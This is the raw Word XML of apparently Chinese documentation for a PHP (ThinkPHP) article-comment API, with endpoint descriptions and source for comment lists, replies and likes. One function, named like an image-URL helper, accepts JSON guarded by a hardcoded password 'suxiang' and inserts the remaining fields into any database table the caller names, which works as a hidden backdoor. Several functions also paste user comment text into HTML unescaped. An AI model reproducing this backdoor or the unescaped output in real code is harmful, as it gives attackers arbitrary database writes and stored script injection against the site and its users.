    </w:p>
    <w:p w14:paraId="76571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$pingDataHtml = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E556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($pingData as $ks =&gt; $vs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272B53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$pingDataHtml .= '&lt;li class="aui-ellipsis-2"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44343B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_user($vs['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C958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$pingDataHtml .= '&lt;a Tapmode onclick="_url({id:' . $vs['uid'] . '},\'u_win\')"&gt;' . $user['username'] . ' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/a&gt;' . $vs['content'] . '&lt;/li&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21619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B6F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($pingNum &gt; 5) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CDF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$pingDataHtml .= '&lt;li class="aui-ellipsis-2"&gt;&lt;a&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看全部</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $pingNum . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条回复</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/a&gt;&lt;/li&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46342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6FFE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$data['data'][$k]['pingDataList'] = $pingDataHtml;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38808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9E7E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$data['data'][$k]['aid'] = $v['aid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7771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($token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D53F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$data['data'][$k]['zanUser'] = Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AD54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-&gt;where('pingId', $v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C886D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$uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CEA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4A2FFA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DB37B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8C4E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B993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4855D5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F452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image_url($data=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B139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39D20D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exit('-1');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A688B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AF1F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json_decode(htmlspecialchars_decode($data), true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A29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(empty($data['pwd']) || $data['pwd'] != 'suxiang') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F820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exit('-2');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7713C1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BEF1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unset($data['pwd']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED2E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$data['__name__'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BED4D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unset($data['__name__']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B741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Db::name($name)-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564FC0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die;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8FE6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8A37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907C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FAA3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/api/article/pingList_xia </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯追评列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437063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资讯追评列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B20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4DE1B9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793A4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60C40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3F10AF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pingId </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E37FE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pages  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量（默认值：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D7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页码（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C5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EBBA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data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25588D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追评内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512ABF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追评赞数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF6A2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time          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D196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img</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A96E7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username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A36FD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zanUser      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已经点赞该追评：</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7ABA51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CF31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失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F4D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3D602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470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pingList_xia() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCCA9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input('post.pages/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1287D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 = input('param.pingId/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A808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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4965C8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($token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BB9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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17341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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4382E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10390F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206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25C2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Validate(['pages' =&gt; 'number', 'pingId' =&gt; 'number|require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9897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['pages' =&gt; $pages, 'pingId' =&gt; $pingId, ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F96D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6FDC8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9D7B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631B9D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356769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4853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C6D7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$where['ping_id'] = $pingId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67556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Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5185A3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-&gt;where($where)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED976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-&gt;order('time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ABF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-&gt;fetchSql(false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C880E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-&gt;paginate($pages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94F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40EC0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3B02E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$data['data'][$k]['zanUser'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A67EB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FB593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$data['data'][$k]['zanUser'] = Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DE2A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2D192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-&gt;where('pingId', $v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3907EA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7FCAC0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04BF8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914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6994E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10775D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4E3EA7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 = date('m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BFA5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$pingNum = Db::name('article_ping_xia')-&gt;where(['ping_id'=&gt;$v['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C2E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if($pingNum){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096B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$pingData=Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5016FA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$v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9829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-&gt;order('time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146AD7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-&gt;limit(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E94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4DE2AA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$pingDataHtml='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB616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($pingData as $ks =&gt; $vs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638546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$pingDataHtml.='&lt;li class="aui-ellipsis-2"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE7DC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$user=_user($vs['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3DE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$pingDataHtml.='&lt;a Tapmode onclick="_url({id:'.$vs['uid'].'},\'u_win\')"&gt;'.$user['username'].' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/a&gt;'.$vs['content'].'&lt;/li&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AFE8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7B45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$data['data'][$k]['pingDataList']=$pingDataHtml;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2116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C743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41467A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$data['data'][$k]['zanUser'] = Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE13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-&gt;where('pingId', $v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA0B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$uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7B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33E11D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E44E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3012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4A76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2AB306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091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pingListPingId2($pingId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DA0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db::name('article_ping')-&gt;where(['id' =&gt; $pingId])-&gt;field('uid,content,pingId2')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C983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45C9EF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_user($db['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE2C7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$db['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D015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07A396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$this-&gt;pingListPingId2($db['pingId2']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB9A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0302E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7A7B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E17E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B91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/api/article/pingView </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调用单个评论内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0585D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调用单个评论内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B2DF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5E2CA0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10402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E036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518467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pingId  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8960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500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{Json} data      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D34D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id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BE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aid    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA57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uid    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00552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zan    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>赞数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E58B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content </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D676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username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EA2F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img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D6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time     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD7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pingNum </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否有追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE97B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huifuNum </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追平数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E446B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user.zan     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否已赞资讯文章评论：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21DCC1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user.guanzhu </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否已关注资讯文章评论作者：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2CFDE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A05C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失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD22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5F1A03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F68E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pingView() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C9C2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B263C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 = input('param.pingId/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E125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3C752F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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7699E0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(!$uid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843C1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5CF7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883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AD99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Validate(['pingId' =&gt; 'number|require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF1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['pingId' =&gt; $pingId, ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7008E6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20893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A9E00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2A8545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5D772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5EF1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735F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Db::name('article_ping')-&gt;where(['id' =&gt; $pingId])-&gt;order('time', 'desc')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7314FC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_user($db['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071B5B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$db['uid'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8BB8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$db['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1EB5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$db['img'] = $user['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B376F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$db['time'] = date('m-d H:i', $db['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C3A9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$db['user']['zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553C7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$db['user']['guanzhu'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A25AF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C72D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$db['user']['zan'] = Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1A3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-&gt;where('pingId', $pingId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9A86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$uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F23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10786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71656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 $db['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF41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($uid != $gz_uid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A7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$db['user']['guanzhu'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177189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$uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BFE5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$gz_uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E26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690EC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C31D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4312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($db['zan']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502999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$zanList = Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F0F8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-&gt;where('pingId', $db['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458CF9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-&gt;order('time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C57D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-&gt;field('uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6035B4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-&gt;limit(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076527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4EAF51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$imgList = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D333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($zanList as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F617B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39DC52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$imgList.= '&lt;img src="' . $user['img'] . '?imageView2/1/w/100/h/100" /&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544EED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EAE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$db['zanList'] = $imgList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396F18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FA76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$db['pingNum'] = Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249FF2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$pingId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271F2E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-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D2C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$db['huifuNum'] = db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159F2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$pingId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501EC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D66B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json($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF56F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BEB1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AC96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/api/article/zanList </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论点赞列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61230B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评论点赞列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18734D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1A75AF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FDB44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9D546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pingId </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56091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pages  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量（默认值：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D65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   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D56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54BF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{Json} data      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论赞数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F49BF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pingId </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B534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uid    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C62A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{Integer} zan    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
